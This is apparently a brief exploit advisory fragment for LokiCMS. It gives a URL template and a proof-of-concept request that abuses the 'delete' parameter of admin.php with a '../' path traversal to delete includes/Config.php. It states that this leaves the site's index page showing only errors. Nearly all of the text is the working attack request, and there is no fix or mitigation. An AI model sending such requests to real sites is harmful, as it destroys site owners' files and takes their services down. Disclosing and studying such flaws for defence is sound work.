    http://[target]/[lokiCMS]/admin.php?delete=[path]/[file]
        
PoC:

    http://[target]/[lokiCMS]/admin.php?delete=../includes/Config.php
       
    Deleting Config.php will casue situation when users won't be able to view index page
    normally. Only errors will be visible...
